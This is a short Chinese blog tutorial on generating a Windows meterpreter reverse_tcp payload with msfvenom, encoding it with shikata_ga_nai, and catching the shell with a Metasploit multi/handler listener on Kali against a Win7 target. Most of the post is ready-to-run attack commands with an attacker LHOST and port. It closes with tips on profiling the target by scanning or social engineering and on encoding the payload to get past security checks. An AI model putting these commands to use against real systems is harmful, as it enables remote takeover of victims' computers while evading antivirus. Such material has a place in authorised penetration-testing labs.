msfvenom实战win7拿shell

版权声明：本文为博主原创文章，未经博主允许不得转载。 https://blog.csdn.net/boke14122621/article/details/86631906

首先可以查询下msfvenom的使用，可以参考以下博客：

https://www.cnblogs.com/xishaonian/p/6851475.html

我这次使用靶机是win7(sp1)  因此选择生成的payload为exe（可执行文件类型） 

      Windows
Msfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o hellok.exe

用msfvenom生成payload :

msfvenom  -p  windows/meterpreter/reverse_tcp  lhost=192.168.76.131 lport=4444  x86/shikata_ga_nai

然后在kaili上开启监听：
use exploit/multi/handler
set payload  你选择的payload
set  lhost  你的ip
set lport  设定的端口 需要和生成时候一致
run   开始监听


将生成的可执行文件放到靶机上执行，执行成功后返回shell即可

 

可以继续使用meterpreter命令，具体可以参考博客：https://blog.csdn.net/qq_34841823/article/details/54926500 

提高成功率的注意事项：

1. 首先要清楚靶机版本信息，可以使用nmap等工具扫描或者通过社工

2. 其次监听时候设置的参数要和生成payload的参数一致

3. 生成的文件要根据具体的环境能够执行且能够绕过检查，通过编码等方式